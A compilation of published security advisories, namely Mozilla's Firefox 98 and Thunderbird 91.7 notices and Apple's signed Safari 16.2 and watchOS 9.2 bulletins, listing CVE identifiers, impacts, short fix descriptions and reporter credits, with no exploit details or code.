Mozilla developers Kershaw Chang, Ryan VanderMeulen, and Randell Jesup reported memory safety bugs present in Firefox 97. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 98.

**Mozilla Foundation Security Advisory 2022-10**

Announced

March 8, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 98

**#CVE-2022-26383: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification.

**References**

*   Bug 1742421

**#CVE-2022-26384: iframe allow-scripts sandbox bypass**

Reporter

Ed McManus

Impact

high

**Description**

If an attacker could control the contents of an iframe sandboxed with allow-popups but not allow-scripts, they were able to craft a link that, when clicked, would lead to JavaScript execution in violation of the sandbox.

**References**

*   Bug 1744352

**#CVE-2022-26387: Time-of-check time-of-use bug when verifying add-on signatures**

Reporter

Armin Ebert

Impact

high

**Description**

When installing an add-on, Firefox verified the signature before prompting the user; but while the user was confirming the prompt, the underlying add-on file could have been modified and Firefox would not have noticed.

**References**

*   Bug 1752979

**#CVE-2022-26381: Use-after-free in text reflows**

Reporter

Mozilla Fuzzing Team and Hossein Lotfi of Trend Micro Zero Day Initiative

Impact

high

**Description**

An attacker could have caused a use-after-free by forcing a text reflow in an SVG object leading to a potentially exploitable crash.

**References**

*   Bug 1736243

**#CVE-2022-26382: Autofill Text could be exfiltrated via side-channel attacks**

Reporter

Young Min Kim

Impact

moderate

**Description**

While the text displayed in Autofill tooltips cannot be directly read by JavaScript, the text was rendered using page fonts. Side-channel attacks on the text by using specially crafted fonts could have lead to this text being inferred by the webpage.

**References**

*   Bug 1741888

**#CVE-2022-26385: Use-after-free in thread shutdown**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

moderate

**Description**

In unusual circumstances, an individual thread may outlive the thread's manager during shutdown. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1747526

**#CVE-2022-0843: Memory safety bugs fixed in Firefox 98**

Reporter

Mozilla developers

Impact

moderate

**Description**

Mozilla developers Kershaw Chang, Ryan VanderMeulen, and Randell Jesup reported memory safety bugs present in Firefox 97. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 98

CVE-2022-0843: Security Vulnerabilities fixed in Firefox 98

When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification. This vulnerability affects Firefox < 98, Firefox ESR < 91.7, and Thunderbird < 91.7.

**Mozilla Foundation Security Advisory 2022-12**

Announced

March 8, 2022

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.7

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2022-26383: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification.

**References**

*   Bug 1742421

**#CVE-2022-26384: iframe allow-scripts sandbox bypass**

Reporter

Ed McManus

Impact

high

**Description**

If an attacker could control the contents of an iframe sandboxed with allow-popups but not allow-scripts, they were able to craft a link that, when clicked, would lead to JavaScript execution in violation of the sandbox.

**References**

*   Bug 1744352

**#CVE-2022-26387: Time-of-check time-of-use bug when verifying add-on signatures**

Reporter

Armin Ebert

Impact

high

**Description**

When installing an add-on, Thunderbird verified the signature before prompting the user; but while the user was confirming the prompt, the underlying add-on file could have been modified and Thunderbird would not have noticed.

**References**

*   Bug 1752979

**#CVE-2022-26381: Use-after-free in text reflows**

Reporter

Mozilla Fuzzing Team and Hossein Lotfi of Trend Micro Zero Day Initiative

Impact

high

**Description**

An attacker could have caused a use-after-free by forcing a text reflow in an SVG object leading to a potentially exploitable crash.

**References**

*   Bug 1736243

**#CVE-2022-26386: Temporary files downloaded to /tmp and accessible by other local users**

Reporter

attila

Impact

low

**Description**

Previously Thunderbird for macOS and Linux would download temporary files to a user-specific directory in /tmp, but this behavior was changed to download them to /tmp where they could be affected by other local users. This behavior was reverted to the original, user-specific directory.  
_This bug only affects Thunderbird for macOS and Linux. Other operating systems are unaffected._

**References**

*   Bug 1752396

CVE-2022-26383: Security Vulnerabilities fixed in Thunderbird 91.7

Apple Security Advisory 2022-12-13-9 - Safari 16.2 addresses bypass, code execution, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-9 Safari 16.2

Safari 16.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213537.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

Additional recognition

WebKit  
We would like to acknowledge an anonymous researcher, scarlet for  
their assistance.

Safari 16.2 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX0ACgkQ4RjMIDke  
NxniRQ/+LTObFcBEWogS56q3+7wjz2BgzBZYn4gwNGfvXf0zZfmXnTE0WXUolVa1  
8/glHt7Tu5/KKfy6JDqmQvrF6fo2YpBgH0wrux/j4VPVCeaaOa2gXRAw0CBa4e4E  
OabGVEXEsgJjyE4MSMKh8Hn1VD4ANTPPKn5jWmDsCsSS2zEo94gD7Mkqh81CeFoV  
Yhmbv87nZAdEz2nHUkoM6PmN8SPAY5VtRp6i1rbkpcmMfs3VyA/ehnkfBGQK2xH7  
vHpx2yyoXlqwR0zc7uHEge13e8kZ1Zh8UdIecgJuoyOvvmRR5DcchMFUYpUq8JcZ  
JOqN2lsRBu52WvoEGCkD80/PWamhD+CJWeMvgbvEZSOiNKKOSY1qO0w0NsGMPXCh  
6xdcjfeTpslNn4zNUfaAwnUGIyxbIsNNHIgw3VX5GnFihpEsknBqbjxTLCBrDdFE  
T5xuHPBj7vXEW3V2ZXVt2MctWCr0GQdHt66C2m3gAEhL9xoN6YMEXLI0RVgUHmaf  
hOY/EZMIGm1cL33OvMKuvWCJuGW81+2+LJSwoscguhrj7Jb2qTOL2w06VDyNftuY  
F876pPWZgEj1O7DAtL9OP8IdrpSmQnAkvVUIZA6Sx3MaxTdl4f6lG4NlcsMGz+se  
PxxMCYWi8f/sPNxSdfoYardNkQcPsKm13UFu+Q9nSuV0A+x0qgA=  
=F0qN  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-9

Apple Security Advisory 2022-12-13-8 - watchOS 9.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-8 watchOS 9.2

watchOS 9.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213536.

Accounts  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AppleAVD  
Available for: Apple Watch Series 4 and later  
Impact: Parsing a maliciously crafted video file may lead to kernel  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

CoreServices  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: Multiple issues were addressed by removing the  
vulnerable code.  
CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Offensive Security

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

iTunes Store  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2022-42837: an anonymous researcher

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

libxml2  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

Safari  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Software Update  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to elevate privileges  
Description: An access issue existed with privileged API calls. This  
issue was addressed with additional restrictions.  
CVE-2022-42849: Mickey Jin (@patch1t)

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke  
NxlyKA//eeU/txeqNxHM7JQE6xFrlla1tinQYMjbLhMgzdTbKpPjX8aHVqFfLB/Q  
5nH+NqrGs4HQwNQJ6fSiBIId0th71mgX7W3Noa1apzFh7Okl6IehczkAFB9OH7ve  
vnwiEECGU0hUNmbIi0s9HuuBo6eSNPFsJt0Jqn8ovV+F9bc+ftl/IRv6q2vg3rl3  
DNag62BCmCN4uXmqoJ4CKg7cNbddvma0bDbB1yYujxdmFwm4JGN6aittXE3WtPK2  
GH2/UxdZll8FR7Zegh1ziUcTaLR4dwHlXRFgc6WC8hqx6T8imNh1heAPwzhT+Iag  
piObDoMs7UYFKF/eQ8LUcl4hX8IOdLFO5I+BcvCzOcKqHutPqbE8QRU9yqjcQlsJ  
sOV7GT9W9J+QhibpIJbLVkkQp5djPZ8mLP0OKiRN1quEDWMrquPdM+r9ftJwEIki  
PLL/ur9c7geXCJCLzglMSMkNcoGZk77qzfJuPdoE0lD6zjdvBHalF5j8S0a1+9gi  
ex3zU1I+ixqg7CvLNfkSjLcO9KOoPEFHnqEFrrO17QWWyraugrPgV0dMYArGRBpA  
FofYP6bXLv8eSUNuyOoQxF6kS4ChYgLUabl2NYqop9LoRWAtDAclTiabuvDJPfqA  
W09wxdhbpp2saxt8LlQjffzOmHJST6oHhHZiFiFswRM0q0nue6I=  
=DltD  
-----END PGP SIGNATURE-----

Tag

#zero_day